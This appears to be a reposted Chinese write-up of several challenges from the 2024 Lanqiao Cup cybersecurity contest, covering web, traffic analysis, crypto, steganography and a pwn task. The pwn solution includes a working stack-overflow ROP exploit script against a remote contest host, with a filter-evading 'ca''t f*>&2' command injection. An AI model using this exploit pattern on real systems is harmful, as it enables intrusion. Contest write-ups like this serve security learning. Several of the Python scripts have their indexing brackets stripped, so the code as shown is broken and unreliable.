2024第十五届蓝桥杯网络安全赛项部门题目 WriteUp
2024第十五届蓝桥杯网络安全赛项部门题目 WriteUp爬虫协议
根据提示,访问/robots.txt,得到敏感路径 /38063b612387b10e22f4bd0d71a46a4e/,访问此中的/9de33df789dc91e984a091e6dce2dfb1得到flag。
flag{494547b4-f13f-47de-b1a5-a99f20495cd7}packet
https://img-blog.csdnimg.cn/direct/6a49fd3137754aedad5f1f8c7adacf43.png#pic_center
使用过滤器tcp contains "flag" 找到flag相关的包,追踪HTTP流得到返回数据ZmxhZ3s3ZDZmMTdhNC0yYjBhLTQ2N2QtOGE0Mi02Njc1MDM2OGMyNDl9Cg==,base64解码得到flag
flag{7d6f17a4-2b0a-467d-8a42-66750368c249}
cc
打开网页,可以得到密文、key和IV,直接使用工具解密:
https://img-blog.csdnimg.cn/direct/19684f9bd48a413f8efd55357a223a79.png#pic_center
rc4
根据提示可知为RC4加密,分析程序,猜测Str为密码,v5为密文,将v5转为unsigned char后利用脚本解密可得flag。
https://img-blog.csdnimg.cn/direct/78330572ea3740308204cad272ec28e6.png#pic_center
脚本:
import base64
def rc4_main(key = "init_key", message = "init_message"):
print("RC4解密主函数调用成功")
print('\n')
s_box = rc4_init_sbox(key)
crypt = rc4_excrypt(message, s_box)
return crypt
def rc4_init_sbox(key):
s_box = list(range(256))
print("原来的 s 盒:%s" % s_box)
print('\n')
j = 0
for i in range(256):
j = (j + s_box + ord(key)) % 256
s_box, s_box = s_box, s_box
print("混乱后的 s 盒:%s"% s_box)
print('\n')
return s_box
def rc4_excrypt(plain, box):
print("调用解密程序成功。")
print('\n')
plain = base64.b64decode(plain.encode('utf-8'))
plain = bytes.decode(plain)
res = []
i = j = 0
for s in plain:
i = (i + 1) % 256
j = (j + box) % 256
box, box = box, box
t = (box + box) % 256
k = box
res.append(chr(ord(s) ^ k))
print("res用于解密字符串,解密后是:%res" %res)
print('\n')
cipher = "".join(res)
print("解密后的字符串是:%s" %cipher)
print('\n')
print("解密后的输出(没经过任何编码):")
print('\n')
return cipher
a= #cipher
key="gamelab@"
s=""
for i in a:
s+=chr(i)
s=str(base64.b64encode(s.encode('utf-8')), 'utf-8')
rc4_main(key, s)得到flag:
解密后的字符串是:flag{12601b2b-2f1e-468a-ae43-92391ff76ef3}
缺失的数据
使用压缩包中的secret.txt作为字典破解压缩包中加密的a.png,然后利用题目附带的脚本稍作修改后运行:
import numpy as np
import cv2
import pywt
class WaterMarkDWT:
def __init__(self, origin: str, watermark: str, key: int, weight: list):
self.key = key
self.img = cv2.imread(origin)
self.mark = cv2.imread(watermark)
self.coef = weight
def arnold(self, img):
r, c = img.shape
p = np.zeros((r, c), np.uint8)
a, b = 1, 1
for k in range(self.key):
for i in range(r):
for j in range(c):
x = (i + b * j) % r
y = (a * i + (a * b + 1) * j) % c
p = img
return p
def deArnold(self, img):
r, c = img.shape
p = np.zeros((r, c), np.uint8)
a, b = 1, 1
for k in range(self.key):
for i in range(r):
for j in range(c):
x = ((a * b + 1) * i - b * j) % r
y = (-a * i + j) % c
p = img
return p
def get(self, size: tuple = (1200, 1200), flag: int = None):
img = cv2.resize(self.img, size)
img1 = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
img2 = cv2.cvtColor(self.mark, cv2.COLOR_RGB2GRAY)
c = pywt.wavedec2(img2, 'db2', level=3)
= c
d = pywt.wavedec2(img1, 'db2', level=3)
= d
a1, a2, a3, a4 = self.coef
ca1 = (cl - dl) * a1
ch1 = (cH3 - dH3) * a2
cv1 = (cV3 - dV3) * a3
cd1 = (cD3 - dD3) * a4
waterImg = pywt.waverec2(, 'db2')
waterImg = np.array(waterImg, np.uint8)
waterImg = self.deArnold(waterImg)
kernel = np.ones((3, 3), np.uint8)
if flag == 0:
waterImg = cv2.erode(waterImg, kernel)
elif flag == 1:
waterImg = cv2.dilate(waterImg, kernel)
cv2.imwrite('水印.png', waterImg)
return waterImg
if __name__ == '__main__':
img = 'a.png'
waterImg = 'newImg.png'
k = 20
xs =
W1 = WaterMarkDWT(img, waterImg, k, xs)
W1.get()得到 水印.png,打开可以看到flag。
fd
简单的栈溢出,但是要根据题目提示,将cat的输出返回到管道符2中,解题脚本如下:
#!/usr/bin/python3
# -*- encoding: utf-8 -*-
from pwn import *
p = remote("47.93.142.153", 25722)
elf = ELF("/mnt/c/Users/崔志鹏/Desktop/临时/pwn")
start_address = 0x400862
ret_address = 0x04005ae
pop_rdi = 0x0400933
# 64位
context(arch="amd64",os="linux")
stack_len = 0x20 + 0x8
payload = b'\x00'*stack_len + p64(ret_address) + p64(pop_rdi) + p64(0x00601090) + p64(elf.plt['system'])
p.sendline(b"ca''t f*>&2")
p.sendline(payload)
p.interactive() #can can needhttps://img-blog.csdnimg.cn/direct/a0e32a8741ab4b189d521a9820329750.png#pic_center
Theorem
https://img-blog.csdnimg.cn/direct/a5730b45f3234a739c10e551bc08a638.png#pic_center
题目脚本中p、q是相邻的素数,间距较小,利用工具中的费马分解得到p、q,随后即可得到私钥及明文。
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]